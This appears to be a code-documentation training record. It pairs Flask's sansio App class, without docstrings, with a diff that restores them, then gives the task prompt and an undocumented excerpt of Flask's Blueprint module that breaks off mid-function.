self.teardown_appcontext_funcs: list[ft.TeardownCallable] = []
#: A list of shell context processor functions that should be run
#: when a shell context is created.
#:
#: .. versionadded:: 0.11
self.shell_context_processors: list[ft.ShellContextProcessorCallable] = []
#: Maps registered blueprint names to blueprint objects. The
#: dict retains the order the blueprints were registered in.
#: Blueprints can be registered multiple times, this dict does
#: not track how often they were attached.
#:
#: .. versionadded:: 0.7
self.blueprints: dict[str, Blueprint] = {}
#: a place where extensions can store application specific state. For
#: example this is where an extension could store database engines and
#: similar things.
#:
#: The key must match the name of the extension module. For example in
#: case of a "Flask-Foo" extension in `flask_foo`, the key would be
#: ``'foo'``.
#:
#: .. versionadded:: 0.7
self.extensions: dict[str, t.Any] = {}
#: The :class:`~werkzeug.routing.Map` for this instance. You can use
#: this to change the routing converters after the class was created
#: but before any routes are connected. Example::
#:
#: from werkzeug.routing import BaseConverter
#:
#: class ListConverter(BaseConverter):
#: def to_python(self, value):
#: return value.split(',')
#: def to_url(self, values):
#: return ','.join(super(ListConverter, self).to_url(value)
#: for value in values)
#:
#: app = Flask(__name__)
#: app.url_map.converters['list'] = ListConverter
self.url_map = self.url_map_class(host_matching=host_matching)
self.subdomain_matching = subdomain_matching
# tracks internally if the application already handled at least one
# request.
self._got_first_request = False
def _check_setup_finished(self, f_name: str) -> None:
if self._got_first_request:
raise AssertionError(
f"The setup method '{f_name}' can no longer be called"
" on the application. It has already handled its first"
" request, any changes will not be applied"
" consistently.\n"
"Make sure all imports, decorators, functions, etc."
" needed to set up the application are done before"
" running it."
)
@cached_property
def name(self) -> str:
if self.import_name == "__main__":
fn: str | None = getattr(sys.modules["__main__"], "__file__", None)
if fn is None:
return "__main__"
return os.path.splitext(os.path.basename(fn))[0]
return self.import_name
@cached_property
def logger(self) -> logging.Logger:
return create_logger(self)
@cached_property
def jinja_env(self) -> Environment:
return self.create_jinja_environment()
def create_jinja_environment(self) -> Environment:
raise NotImplementedError()
def make_config(self, instance_relative: bool = False) -> Config:
root_path = self.root_path
if instance_relative:
root_path = self.instance_path
defaults = dict(self.default_config)
defaults["DEBUG"] = get_debug_flag()
return self.config_class(root_path, defaults)
def make_aborter(self) -> Aborter:
return self.aborter_class()
def auto_find_instance_path(self) -> str:
prefix, package_path = find_package(self.import_name)
if prefix is None:
return os.path.join(package_path, "instance")
return os.path.join(prefix, "var", f"{self.name}-instance")
def create_global_jinja_loader(self) -> DispatchingJinjaLoader:
return DispatchingJinjaLoader(self)
def select_jinja_autoescape(self, filename: str | None) -> bool:
if filename is None:
return True
return filename.endswith((".html", ".htm", ".xml", ".xhtml", ".svg"))
@property
def debug(self) -> bool:
return self.config["DEBUG"] # type: ignore[no-any-return]
@debug.setter
def debug(self, value: bool) -> None:
self.config["DEBUG"] = value
if self.config["TEMPLATES_AUTO_RELOAD"] is None:
self.jinja_env.auto_reload = value
@setupmethod
def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None:
blueprint.register(self, options)
def iter_blueprints(self) -> t.ValuesView[Blueprint]:
return self.blueprints.values()
@setupmethod
def add_url_rule(
self,
rule: str,
endpoint: str | None = None,
view_func: ft.RouteCallable | None = None,
provide_automatic_options: bool | None = None,
**options: t.Any,
) -> None:
if endpoint is None:
endpoint = _endpoint_from_view_func(view_func) # type: ignore
options["endpoint"] = endpoint
methods = options.pop("methods", None)
# if the methods are not given and the view_func object knows its
# methods we can use that instead. If neither exists, we go with
# a tuple of only ``GET`` as default.
if methods is None:
methods = getattr(view_func, "methods", None) or ("GET",)
if isinstance(methods, str):
raise TypeError(
"Allowed methods must be a list of strings, for"
' example: @app.route(..., methods=["POST"])'
)
methods = {item.upper() for item in methods}
# Methods that should always be added
required_methods: set[str] = set(getattr(view_func, "required_methods", ()))
if provide_automatic_options is None:
provide_automatic_options = getattr(
view_func, "provide_automatic_options", None
)
if provide_automatic_options is None:
provide_automatic_options = (
"OPTIONS" not in methods
and self.config["PROVIDE_AUTOMATIC_OPTIONS"]
)
if provide_automatic_options:
required_methods.add("OPTIONS")
# Add the required methods now.
methods |= required_methods
rule_obj = self.url_rule_class(rule, methods=methods, **options)
rule_obj.provide_automatic_options = provide_automatic_options # type: ignore[attr-defined]
self.url_map.add(rule_obj)
if view_func is not None:
old_func = self.view_functions.get(endpoint)
if old_func is not None and old_func != view_func:
raise AssertionError(
"View function mapping is overwriting an existing"
f" endpoint function: {endpoint}"
)
self.view_functions[endpoint] = view_func
@t.overload
def template_filter(self, name: T_template_filter) -> T_template_filter: ...
@t.overload
def template_filter(
self, name: str | None = None
) -> t.Callable[[T_template_filter], T_template_filter]: ...
@setupmethod
def template_filter(
self, name: T_template_filter | str | None = None
) -> T_template_filter | t.Callable[[T_template_filter], T_template_filter]:
if callable(name):
self.add_template_filter(name)
return name
def decorator(f: T_template_filter) -> T_template_filter:
self.add_template_filter(f, name=name)
return f
return decorator
@setupmethod
def add_template_filter(
self, f: ft.TemplateFilterCallable, name: str | None = None
) -> None:
self.jinja_env.filters[name or f.__name__] = f
@t.overload
def template_test(self, name: T_template_test) -> T_template_test: ...
@t.overload
def template_test(
self, name: str | None = None
) -> t.Callable[[T_template_test], T_template_test]: ...
@setupmethod
def template_test(
self, name: T_template_test | str | None = None
) -> T_template_test | t.Callable[[T_template_test], T_template_test]:
if callable(name):
self.add_template_test(name)
return name
def decorator(f: T_template_test) -> T_template_test:
self.add_template_test(f, name=name)
return f
return decorator
@setupmethod
def add_template_test(
self, f: ft.TemplateTestCallable, name: str | None = None
) -> None:
self.jinja_env.tests[name or f.__name__] = f
@t.overload
def template_global(self, name: T_template_global) -> T_template_global: ...
@t.overload
def template_global(
self, name: str | None = None
) -> t.Callable[[T_template_global], T_template_global]: ...
@setupmethod
def template_global(
self, name: T_template_global | str | None = None
) -> T_template_global | t.Callable[[T_template_global], T_template_global]:
if callable(name):
self.add_template_global(name)
return name
def decorator(f: T_template_global) -> T_template_global:
self.add_template_global(f, name=name)
return f
return decorator
@setupmethod
def add_template_global(
self, f: ft.TemplateGlobalCallable, name: str | None = None
) -> None:
self.jinja_env.globals[name or f.__name__] = f
@setupmethod
def teardown_appcontext(self, f: T_teardown) -> T_teardown:
self.teardown_appcontext_funcs.append(f)
return f
@setupmethod
def shell_context_processor(
self, f: T_shell_context_processor
) -> T_shell_context_processor:
self.shell_context_processors.append(f)
return f
def _find_error_handler(
self, e: Exception, blueprints: list[str]
) -> ft.ErrorHandlerCallable | None:
exc_class, code = self._get_exc_class_and_code(type(e))
names = (*blueprints, None)
for c in (code, None) if code is not None else (None,):
for name in names:
handler_map = self.error_handler_spec[name][c]
if not handler_map:
continue
for cls in exc_class.__mro__:
handler = handler_map.get(cls)
if handler is not None:
return handler
return None
def trap_http_exception(self, e: Exception) -> bool:
if self.config["TRAP_HTTP_EXCEPTIONS"]:
return True
trap_bad_request = self.config["TRAP_BAD_REQUEST_ERRORS"]
# if unset, trap key errors in debug mode
if (
trap_bad_request is None
and self.debug
and isinstance(e, BadRequestKeyError)
):
return True
if trap_bad_request:
return isinstance(e, BadRequest)
return False
should_ignore_error: None = None
"""If this method returns ``True``, the error will not be passed to
teardown handlers, and the context will not be preserved for
debugging.
.. deprecated:: 3.2
Handle errors as needed in teardown handlers instead.
.. versionadded:: 0.10
"""
def redirect(self, location: str, code: int = 303) -> BaseResponse:
return _wz_redirect(
location,
code=code,
Response=self.response_class, # type: ignore[arg-type]
)
def inject_url_defaults(self, endpoint: str, values: dict[str, t.Any]) -> None:
names: t.Iterable[str | None] = (None,)
# url_for may be called outside a request context, parse the
# passed endpoint instead of using request.blueprints.
if "." in endpoint:
names = chain(
names, reversed(_split_blueprint_path(endpoint.rpartition(".")[0]))
)
for name in names:
if name in self.url_default_functions:
for func in self.url_default_functions[name]:
func(endpoint, values)
def handle_url_build_error(
self, error: BuildError, endpoint: str, values: dict[str, t.Any]
) -> str:
for handler in self.url_build_error_handlers:
try:
rv = handler(error, endpoint, values)
except BuildError as e:
# make error available outside except block
error = e
else:
if rv is not None:
return rv
# Re-raise if called with an active exception, otherwise raise
# the passed in exception.
if error is sys.exc_info()[1]:
raise
raise error | --- +++ @@ -57,6 +57,101 @@
class App(Scaffold):
+ """The flask object implements a WSGI application and acts as the central
+ object. It is passed the name of the module or package of the
+ application. Once it is created it will act as a central registry for
+ the view functions, the URL rules, template configuration and much more.
+
+ The name of the package is used to resolve resources from inside the
+ package or the folder the module is contained in depending on if the
+ package parameter resolves to an actual python package (a folder with
+ an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file).
+
+ For more information about resource loading, see :func:`open_resource`.
+
+ Usually you create a :class:`Flask` instance in your main module or
+ in the :file:`__init__.py` file of your package like this::
+
+ from flask import Flask
+ app = Flask(__name__)
+
+ .. admonition:: About the First Parameter
+
+ The idea of the first parameter is to give Flask an idea of what
+ belongs to your application. This name is used to find resources
+ on the filesystem, can be used by extensions to improve debugging
+ information and a lot more.
+
+ So it's important what you provide there. If you are using a single
+ module, `__name__` is always the correct value. If you however are
+ using a package, it's usually recommended to hardcode the name of
+ your package there.
+
+ For example if your application is defined in :file:`yourapplication/app.py`
+ you should create it with one of the two versions below::
+
+ app = Flask('yourapplication')
+ app = Flask(__name__.split('.')[0])
+
+ Why is that? The application will work even with `__name__`, thanks
+ to how resources are looked up. However it will make debugging more
+ painful. Certain extensions can make assumptions based on the
+ import name of your application. For example the Flask-SQLAlchemy
+ extension will look for the code in your application that triggered
+ an SQL query in debug mode. If the import name is not properly set
+ up, that debugging information is lost. (For example it would only
+ pick up SQL queries in `yourapplication.app` and not
+ `yourapplication.views.frontend`)
+
+ .. versionadded:: 0.7
+ The `static_url_path`, `static_folder`, and `template_folder`
+ parameters were added.
+
+ .. versionadded:: 0.8
+ The `instance_path` and `instance_relative_config` parameters were
+ added.
+
+ .. versionadded:: 0.11
+ The `root_path` parameter was added.
+
+ .. versionadded:: 1.0
+ The ``host_matching`` and ``static_host`` parameters were added.
+
+ .. versionadded:: 1.0
+ The ``subdomain_matching`` parameter was added. Subdomain
+ matching needs to be enabled manually now. Setting
+ :data:`SERVER_NAME` does not implicitly enable it.
+
+ :param import_name: the name of the application package
+ :param static_url_path: can be used to specify a different path for the
+ static files on the web. Defaults to the name
+ of the `static_folder` folder.
+ :param static_folder: The folder with static files that is served at
+ ``static_url_path``. Relative to the application ``root_path``
+ or an absolute path. Defaults to ``'static'``.
+ :param static_host: the host to use when adding the static route.
+ Defaults to None. Required when using ``host_matching=True``
+ with a ``static_folder`` configured.
+ :param host_matching: set ``url_map.host_matching`` attribute.
+ Defaults to False.
+ :param subdomain_matching: consider the subdomain relative to
+ :data:`SERVER_NAME` when matching routes. Defaults to False.
+ :param template_folder: the folder that contains the templates that should
+ be used by the application. Defaults to
+ ``'templates'`` folder in the root path of the
+ application.
+ :param instance_path: An alternative instance path for the application.
+ By default the folder ``'instance'`` next to the
+ package or module is assumed to be the instance
+ path.
+ :param instance_relative_config: if set to ``True`` relative filenames
+ for loading the config are assumed to
+ be relative to the instance path instead
+ of the application root.
+ :param root_path: The path to the root of the application files.
+ This should only be set manually when it can't be detected
+ automatically, such as for namespace packages.
+ """
#: The class of the object assigned to :attr:`aborter`, created by
#: :meth:`create_aborter`. That object is called by
@@ -326,6 +421,14 @@
@cached_property
def name(self) -> str:
+ """The name of the application. This is usually the import name
+ with the difference that it's guessed from the run file if the
+ import name is main. This name is used as a display name when
+ Flask needs the name of the application. It can be set and overridden
+ to change the value.
+
+ .. versionadded:: 0.8
+ """
if self.import_name == "__main__":
fn: str | None = getattr(sys.modules["__main__"], "__file__", None)
if fn is None:
@@ -335,16 +438,53 @@
@cached_property
def logger(self) -> logging.Logger:
+ """A standard Python :class:`~logging.Logger` for the app, with
+ the same name as :attr:`name`.
+
+ In debug mode, the logger's :attr:`~logging.Logger.level` will
+ be set to :data:`~logging.DEBUG`.
+
+ If there are no handlers configured, a default handler will be
+ added. See :doc:`/logging` for more information.
+
+ .. versionchanged:: 1.1.0
+ The logger takes the same name as :attr:`name` rather than
+ hard-coding ``"flask.app"``.
+
+ .. versionchanged:: 1.0.0
+ Behavior was simplified. The logger is always named
+ ``"flask.app"``. The level is only set during configuration,
+ it doesn't check ``app.debug`` each time. Only one format is
+ used, not different ones depending on ``app.debug``. No
+ handlers are removed, and a handler is only added if no
+ handlers are already configured.
+
+ .. versionadded:: 0.3
+ """
return create_logger(self)
@cached_property
def jinja_env(self) -> Environment:
+ """The Jinja environment used to load templates.
+
+ The environment is created the first time this property is
+ accessed. Changing :attr:`jinja_options` after that will have no
+ effect.
+ """
return self.create_jinja_environment()
def create_jinja_environment(self) -> Environment:
raise NotImplementedError()
def make_config(self, instance_relative: bool = False) -> Config:
+ """Used to create the config attribute by the Flask constructor.
+ The `instance_relative` parameter is passed in from the constructor
+ of Flask (there named `instance_relative_config`) and indicates if
+ the config should be relative to the instance path or the root path
+ of the application.
+
+ .. versionadded:: 0.8
+ """
root_path = self.root_path
if instance_relative:
root_path = self.instance_path
@@ -353,24 +493,67 @@ return self.config_class(root_path, defaults)
def make_aborter(self) -> Aborter:
+ """Create the object to assign to :attr:`aborter`. That object
+ is called by :func:`flask.abort` to raise HTTP errors, and can
+ be called directly as well.
+
+ By default, this creates an instance of :attr:`aborter_class`,
+ which defaults to :class:`werkzeug.exceptions.Aborter`.
+
+ .. versionadded:: 2.2
+ """
return self.aborter_class()
def auto_find_instance_path(self) -> str:
+ """Tries to locate the instance path if it was not provided to the
+ constructor of the application class. It will basically calculate
+ the path to a folder named ``instance`` next to your main file or
+ the package.
+
+ .. versionadded:: 0.8
+ """
prefix, package_path = find_package(self.import_name)
if prefix is None:
return os.path.join(package_path, "instance")
return os.path.join(prefix, "var", f"{self.name}-instance")
def create_global_jinja_loader(self) -> DispatchingJinjaLoader:
+ """Creates the loader for the Jinja environment. Can be used to
+ override just the loader and keeping the rest unchanged. It's
+ discouraged to override this function. Instead one should override
+ the :meth:`jinja_loader` function instead.
+
+ The global loader dispatches between the loaders of the application
+ and the individual blueprints.
+
+ .. versionadded:: 0.7
+ """
return DispatchingJinjaLoader(self)
def select_jinja_autoescape(self, filename: str | None) -> bool:
+ """Returns ``True`` if autoescaping should be active for the given
+ template name. If no template name is given, returns `True`.
+
+ .. versionchanged:: 2.2
+ Autoescaping is now enabled by default for ``.svg`` files.
+
+ .. versionadded:: 0.5
+ """
if filename is None:
return True
return filename.endswith((".html", ".htm", ".xml", ".xhtml", ".svg"))
@property
def debug(self) -> bool:
+ """Whether debug mode is enabled. When using ``flask run`` to start the
+ development server, an interactive debugger will be shown for unhandled
+ exceptions, and the server will be reloaded when code changes. This maps to the
+ :data:`DEBUG` config key. It may not behave as expected if set late.
+
+ **Do not enable debug mode when deploying in production.**
+
+ Default: ``False``
+ """
return self.config["DEBUG"] # type: ignore[no-any-return]
@debug.setter
@@ -382,9 +565,37 @@
@setupmethod
def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None:
+ """Register a :class:`~flask.Blueprint` on the application. Keyword
+ arguments passed to this method will override the defaults set on the
+ blueprint.
+
+ Calls the blueprint's :meth:`~flask.Blueprint.register` method after
+ recording the blueprint in the application's :attr:`blueprints`.
+
+ :param blueprint: The blueprint to register.
+ :param url_prefix: Blueprint routes will be prefixed with this.
+ :param subdomain: Blueprint routes will match on this subdomain.
+ :param url_defaults: Blueprint routes will use these default values for
+ view arguments.
+ :param options: Additional keyword arguments are passed to
+ :class:`~flask.blueprints.BlueprintSetupState`. They can be
+ accessed in :meth:`~flask.Blueprint.record` callbacks.
+
+ .. versionchanged:: 2.0.1
+ The ``name`` option can be used to change the (pre-dotted)
+ name the blueprint is registered with. This allows the same
+ blueprint to be registered multiple times with unique names
+ for ``url_for``.
+
+ .. versionadded:: 0.7
+ """
blueprint.register(self, options)
def iter_blueprints(self) -> t.ValuesView[Blueprint]:
+ """Iterates over all blueprints by the order they were registered.
+
+ .. versionadded:: 0.11
+ """
return self.blueprints.values()
@setupmethod
@@ -456,6 +667,21 @@ def template_filter(
self, name: T_template_filter | str | None = None
) -> T_template_filter | t.Callable[[T_template_filter], T_template_filter]:
+ """Decorate a function to register it as a custom Jinja filter. The name
+ is optional. The decorator may be used without parentheses.
+
+ .. code-block:: python
+
+ @app.template_filter("reverse")
+ def reverse_filter(s):
+ return reversed(s)
+
+ The :meth:`add_template_filter` method may be used to register a
+ function later rather than decorating.
+
+ :param name: The name to register the filter as. If not given, uses the
+ function's name.
+ """
if callable(name):
self.add_template_filter(name)
return name
@@ -470,6 +696,15 @@ def add_template_filter(
self, f: ft.TemplateFilterCallable, name: str | None = None
) -> None:
+ """Register a function to use as a custom Jinja filter.
+
+ The :meth:`template_filter` decorator can be used to register a function
+ by decorating instead.
+
+ :param f: The function to register.
+ :param name: The name to register the filter as. If not given, uses the
+ function's name.
+ """
self.jinja_env.filters[name or f.__name__] = f
@t.overload
@@ -482,6 +717,28 @@ def template_test(
self, name: T_template_test | str | None = None
) -> T_template_test | t.Callable[[T_template_test], T_template_test]:
+ """Decorate a function to register it as a custom Jinja test. The name
+ is optional. The decorator may be used without parentheses.
+
+ .. code-block:: python
+
+ @app.template_test("prime")
+ def is_prime_test(n):
+ if n == 2:
+ return True
+ for i in range(2, int(math.ceil(math.sqrt(n))) + 1):
+ if n % i == 0:
+ return False
+ return True
+
+ The :meth:`add_template_test` method may be used to register a function
+ later rather than decorating.
+
+ :param name: The name to register the filter as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
if callable(name):
self.add_template_test(name)
return name
@@ -496,6 +753,17 @@ def add_template_test(
self, f: ft.TemplateTestCallable, name: str | None = None
) -> None:
+ """Register a function to use as a custom Jinja test.
+
+ The :meth:`template_test` decorator can be used to register a function
+ by decorating instead.
+
+ :param f: The function to register.
+ :param name: The name to register the test as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
self.jinja_env.tests[name or f.__name__] = f
@t.overload
@@ -508,6 +776,23 @@ def template_global(
self, name: T_template_global | str | None = None
) -> T_template_global | t.Callable[[T_template_global], T_template_global]:
+ """Decorate a function to register it as a custom Jinja global. The name
+ is optional. The decorator may be used without parentheses.
+
+ .. code-block:: python
+
+ @app.template_global
+ def double(n):
+ return 2 * n
+
+ The :meth:`add_template_global` method may be used to register a
+ function later rather than decorating.
+
+ :param name: The name to register the global as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
if callable(name):
self.add_template_global(name)
return name
@@ -522,10 +807,47 @@ def add_template_global(
self, f: ft.TemplateGlobalCallable, name: str | None = None
) -> None:
+ """Register a function to use as a custom Jinja global.
+
+ The :meth:`template_global` decorator can be used to register a function
+ by decorating instead.
+
+ :param f: The function to register.
+ :param name: The name to register the global as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
self.jinja_env.globals[name or f.__name__] = f
@setupmethod
def teardown_appcontext(self, f: T_teardown) -> T_teardown:
+ """Registers a function to be called when the app context is popped. The
+ context is popped at the end of a request, CLI command, or manual ``with``
+ block.
+
+ .. code-block:: python
+
+ with app.app_context():
+ ...
+
+ When the ``with`` block exits (or ``ctx.pop()`` is called), the
+ teardown functions are called just before the app context is
+ made inactive.
+
+ When a teardown function was called because of an unhandled
+ exception it will be passed an error object. If an
+ :meth:`errorhandler` is registered, it will handle the exception
+ and the teardown will not receive it.
+
+ Teardown functions must avoid raising exceptions. If they
+ execute code that might fail they must surround that code with a
+ ``try``/``except`` block and log any errors.
+
+ The return values of teardown functions are ignored.
+
+ .. versionadded:: 0.9
+ """
self.teardown_appcontext_funcs.append(f)
return f
@@ -533,12 +855,21 @@ def shell_context_processor(
self, f: T_shell_context_processor
) -> T_shell_context_processor:
+ """Registers a shell context processor function.
+
+ .. versionadded:: 0.11
+ """
self.shell_context_processors.append(f)
return f
def _find_error_handler(
self, e: Exception, blueprints: list[str]
) -> ft.ErrorHandlerCallable | None:
+ """Return a registered error handler for an exception in this order:
+ blueprint handler for a specific code, app handler for a specific code,
+ blueprint handler for an exception class, app handler for an exception
+ class, or ``None`` if a suitable handler is not found.
+ """
exc_class, code = self._get_exc_class_and_code(type(e))
names = (*blueprints, None)
@@ -557,6 +888,22 @@ return None
def trap_http_exception(self, e: Exception) -> bool:
+ """Checks if an HTTP exception should be trapped or not. By default
+ this will return ``False`` for all exceptions except for a bad request
+ key error if ``TRAP_BAD_REQUEST_ERRORS`` is set to ``True``. It
+ also returns ``True`` if ``TRAP_HTTP_EXCEPTIONS`` is set to ``True``.
+
+ This is called for all HTTP exceptions raised by a view function.
+ If it returns ``True`` for any exception the error handler for this
+ exception is not called and it shows up as regular exception in the
+ traceback. This is helpful for debugging implicitly raised HTTP
+ exceptions.
+
+ .. versionchanged:: 1.0
+ Bad request errors are not trapped by default in debug mode.
+
+ .. versionadded:: 0.8
+ """
if self.config["TRAP_HTTP_EXCEPTIONS"]:
return True
@@ -587,6 +934,20 @@ """
def redirect(self, location: str, code: int = 303) -> BaseResponse:
+ """Create a redirect response object.
+
+ This is called by :func:`flask.redirect`, and can be called
+ directly as well.
+
+ :param location: The URL to redirect to.
+ :param code: The status code for the redirect.
+
+ .. versionchanged:: 3.2
+ ``code`` defaults to ``303`` instead of ``302``.
+
+ .. versionadded:: 2.2
+ Moved from ``flask.redirect``, which calls this method.
+ """
return _wz_redirect(
location,
code=code,
@@ -594,6 +955,12 @@ )
def inject_url_defaults(self, endpoint: str, values: dict[str, t.Any]) -> None:
+ """Injects the URL defaults for the given endpoint directly into
+ the values dictionary passed. This is used internally and
+ automatically called on URL building.
+
+ .. versionadded:: 0.7
+ """
names: t.Iterable[str | None] = (None,)
# url_for may be called outside a request context, parse the
@@ -611,6 +978,20 @@ def handle_url_build_error(
self, error: BuildError, endpoint: str, values: dict[str, t.Any]
) -> str:
+ """Called by :meth:`.url_for` if a
+ :exc:`~werkzeug.routing.BuildError` was raised. If this returns
+ a value, it will be returned by ``url_for``, otherwise the error
+ will be re-raised.
+
+ Each function in :attr:`url_build_error_handlers` is called with
+ ``error``, ``endpoint`` and ``values``. If a function returns
+ ``None`` or raises a ``BuildError``, it is skipped. Otherwise,
+ its return value is returned by ``url_for``.
+
+ :param error: The active ``BuildError`` being handled.
+ :param endpoint: The endpoint being built.
+ :param values: The keyword arguments passed to ``url_for``.
+ """
for handler in self.url_build_error_handlers:
try:
rv = handler(error, endpoint, values)
@@ -626,4 +1007,4 @@ if error is sys.exc_info()[1]:
raise
- raise error+ raise error
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/sansio/app.py |
Add docstrings to clarify complex logic | from __future__ import annotations
import os
import typing as t
from collections import defaultdict
from functools import update_wrapper
from .. import typing as ft
from .scaffold import _endpoint_from_view_func
from .scaffold import _sentinel
from .scaffold import Scaffold
from .scaffold import setupmethod
if t.TYPE_CHECKING: # pragma: no cover
from .app import App
DeferredSetupFunction = t.Callable[["BlueprintSetupState"], None]
T_after_request = t.TypeVar("T_after_request", bound=ft.AfterRequestCallable[t.Any])
T_before_request = t.TypeVar("T_before_request", bound=ft.BeforeRequestCallable)
T_error_handler = t.TypeVar("T_error_handler", bound=ft.ErrorHandlerCallable)
T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable)
T_template_context_processor = t.TypeVar(
"T_template_context_processor", bound=ft.TemplateContextProcessorCallable
)
T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable)
T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable)
T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable)
T_url_defaults = t.TypeVar("T_url_defaults", bound=ft.URLDefaultCallable)
T_url_value_preprocessor = t.TypeVar(
"T_url_value_preprocessor", bound=ft.URLValuePreprocessorCallable
)
class BlueprintSetupState:
def __init__(
self,
blueprint: Blueprint,
app: App,
options: t.Any,
first_registration: bool,
) -> None:
#: a reference to the current application
self.app = app
#: a reference to the blueprint that created this setup state.
self.blueprint = blueprint
#: a dictionary with all options that were passed to the
#: :meth:`~flask.Flask.register_blueprint` method.
self.options = options
#: as blueprints can be registered multiple times with the
#: application and not everything wants to be registered
#: multiple times on it, this attribute can be used to figure
#: out if the blueprint was registered in the past already.
self.first_registration = first_registration
subdomain = self.options.get("subdomain")
if subdomain is None:
subdomain = self.blueprint.subdomain
#: The subdomain that the blueprint should be active for, ``None``
#: otherwise.
self.subdomain = subdomain
url_prefix = self.options.get("url_prefix")
if url_prefix is None:
url_prefix = self.blueprint.url_prefix
#: The prefix that should be used for all URLs defined on the
#: blueprint.
self.url_prefix = url_prefix
self.name = self.options.get("name", blueprint.name)
self.name_prefix = self.options.get("name_prefix", "")
#: A dictionary with URL defaults that is added to each and every
#: URL that was defined with the blueprint.
self.url_defaults = dict(self.blueprint.url_values_defaults)
self.url_defaults.update(self.options.get("url_defaults", ()))
def add_url_rule(
self,
rule: str,
endpoint: str | None = None,
view_func: ft.RouteCallable | None = None,
**options: t.Any,
) -> None:
if self.url_prefix is not None:
if rule:
rule = "/".join((self.url_prefix.rstrip("/"), rule.lstrip("/")))
else:
rule = self.url_prefix
options.setdefault("subdomain", self.subdomain)
if endpoint is None:
endpoint = _endpoint_from_view_func(view_func) # type: ignore
defaults = self.url_defaults
if "defaults" in options:
defaults = dict(defaults, **options.pop("defaults"))
self.app.add_url_rule(
rule,
f"{self.name_prefix}.{self.name}.{endpoint}".lstrip("."),
view_func,
defaults=defaults,
**options,
)
class Blueprint(Scaffold):
_got_registered_once = False
def __init__(
self,
name: str,
import_name: str,
static_folder: str | os.PathLike[str] | None = None,
static_url_path: str | None = None,
template_folder: str | os.PathLike[str] | None = None,
url_prefix: str | None = None,
subdomain: str | None = None,
url_defaults: dict[str, t.Any] | None = None,
root_path: str | None = None,
cli_group: str | None = _sentinel, # type: ignore[assignment]
):
super().__init__(
import_name=import_name,
static_folder=static_folder,
static_url_path=static_url_path,
template_folder=template_folder,
root_path=root_path,
)
if not name:
raise ValueError("'name' may not be empty.")
if "." in name:
raise ValueError("'name' may not contain a dot '.' character.")
self.name = name
self.url_prefix = url_prefix
self.subdomain = subdomain
self.deferred_functions: list[DeferredSetupFunction] = []
if url_defaults is None:
url_defaults = {}
self.url_values_defaults = url_defaults
self.cli_group = cli_group
self._blueprints: list[tuple[Blueprint, dict[str, t.Any]]] = []
def _check_setup_finished(self, f_name: str) -> None:
if self._got_registered_once:
raise AssertionError(
f"The setup method '{f_name}' can no longer be called on the blueprint"
f" '{self.name}'. It has already been registered at least once, any"
" changes will not be applied consistently.\n"
"Make sure all imports, decorators, functions, etc. needed to set up"
" the blueprint are done before registering it."
)
@setupmethod
def record(self, func: DeferredSetupFunction) -> None:
self.deferred_functions.append(func)
@setupmethod
def record_once(self, func: DeferredSetupFunction) -> None:
def wrapper(state: BlueprintSetupState) -> None:
if state.first_registration:
func(state)
self.record(update_wrapper(wrapper, func))
def make_setup_state(
self, app: App, options: dict[str, t.Any], first_registration: bool = False
) -> BlueprintSetupState:
return BlueprintSetupState(self, app, options, first_registration)
@setupmethod
def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None:
if blueprint is self:
raise ValueError("Cannot register a blueprint on itself")
self._blueprints.append((blueprint, options))
def register(self, app: App, options: dict[str, t.Any]) -> None:
name_prefix = options.get("name_prefix", "")
self_name = options.get("name", self.name)
name = f"{name_prefix}.{self_name}".lstrip(".")
if name in app.blueprints:
bp_desc = "this" if app.blueprints[name] is self else "a different"
existing_at = f" '{name}'" if self_name != name else ""
raise ValueError(
f"The name '{self_name}' is already registered for"
f" {bp_desc} blueprint{existing_at}. Use 'name=' to"
f" provide a unique name."
)
first_bp_registration = not any(bp is self for bp in app.blueprints.values())
first_name_registration = name not in app.blueprints
app.blueprints[name] = self
self._got_registered_once = True
state = self.make_setup_state(app, options, first_bp_registration)
if self.has_static_folder:
state.add_url_rule(
f"{self.static_url_path}/<path:filename>",
view_func=self.send_static_file, # type: ignore[attr-defined]
endpoint="static",
)
# Merge blueprint data into parent.
if first_bp_registration or first_name_registration:
self._merge_blueprint_funcs(app, name)
for deferred in self.deferred_functions:
deferred(state)
cli_resolved_group = options.get("cli_group", self.cli_group)
if self.cli.commands:
if cli_resolved_group is None:
app.cli.commands.update(self.cli.commands)
elif cli_resolved_group is _sentinel:
self.cli.name = name
app.cli.add_command(self.cli)
else:
self.cli.name = cli_resolved_group
app.cli.add_command(self.cli)
for blueprint, bp_options in self._blueprints:
bp_options = bp_options.copy()
bp_url_prefix = bp_options.get("url_prefix")
bp_subdomain = bp_options.get("subdomain")
if bp_subdomain is None:
bp_subdomain = blueprint.subdomain
if state.subdomain is not None and bp_subdomain is not None:
bp_options["subdomain"] = bp_subdomain + "." + state.subdomain
elif bp_subdomain is not None:
bp_options["subdomain"] = bp_subdomain
elif state.subdomain is not None:
bp_options["subdomain"] = state.subdomain
if bp_url_prefix is None:
bp_url_prefix = blueprint.url_prefix
if state.url_prefix is not None and bp_url_prefix is not None:
bp_options["url_prefix"] = (
state.url_prefix.rstrip("/") + "/" + bp_url_prefix.lstrip("/")
)
elif bp_url_prefix is not None:
bp_options["url_prefix"] = bp_url_prefix
elif state.url_prefix is not None:
bp_options["url_prefix"] = state.url_prefix
bp_options["name_prefix"] = name
blueprint.register(app, bp_options)
def _merge_blueprint_funcs(self, app: App, name: str) -> None:
def extend(
bp_dict: dict[ft.AppOrBlueprintKey, list[t.Any]],
parent_dict: dict[ft.AppOrBlueprintKey, list[t.Any]],
) -> None:
for key, values in bp_dict.items():
key = name if key is None else f"{name}.{key}"
parent_dict[key].extend(values)
for key, value in self.error_handler_spec.items():
key = name if key is None else f"{name}.{key}"
value = defaultdict(
dict,
{
code: {exc_class: func for exc_class, func in code_values.items()}
for code, code_values in value.items()
},
)
